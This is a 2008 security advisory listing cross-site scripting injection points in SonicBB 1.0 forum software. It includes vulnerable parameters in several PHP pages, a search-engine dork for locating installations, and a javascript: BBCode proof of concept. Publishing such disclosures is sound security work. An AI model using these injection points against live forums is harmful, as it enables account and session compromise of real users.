SonicBB versions 1.0 and below suffer from multiple cross site scripting vulnerabilities.
dbe512712b9f79b3575d1b97c9ed965d797ab52f957aac51bf8f5c4df69c3b0c
+----------------------------------------------------------------------+
| |
| SonicBB <= 1.0 Multiple XSS Vulnerabilities |
| Revisited by Xylitol |
| http://xylilabs.free.fr |
| |
+----------------------------------------------------------------------+
AUTHOR : Xylitol
DATE : 23 Dec 2008
WEBSiTE : xylilabs.free.fr
CONTACT : Check my site
########################################################################
APPLiCATiON : Sonic Bulletin Board
DEMO : http://www.iscripts.com/sonicbb/demo/
DOWNLOAD : http://www.iscripts.com/productlistingdetail.php?productid=10
WEBSiTE : http://www.iscripts.com
########################################################################
[+] vulns & Exploits :
lame dork : « Powered by iScripts SonicBB »
####[MEDIUMS XSS]####
viewforum.php: id=1[XSS]
search.php: query=[XSS]
Admin.php: bdo=set&user=[XSS]&rank=1
post.php: id=257&do=edit&p=1[XSS]
####[CRITICALS XSS]####
usercp.php:
aim=[XSS]&msn=[XSS]&yim=[XSS]&icq=[XSS]
usercp.php:
fname=[XSS]&lname=[XSS]
post.php:
title=Re%3A+Support+Requests&post=[XSS]
Message PoC:
[url=javascript:alert('XSS');]click me[/url]
[+] Solution :
n/a
[~] Greetings :
Stack, Sheiry, PHPLizardo, Xonzai, KPCR, Sh0ck, meloulisi, Tr00ps, v00d00chile, Uber0n, Langy, code91, t0fx
xssing, sla.ckers and security-sh3ll ppl, and you !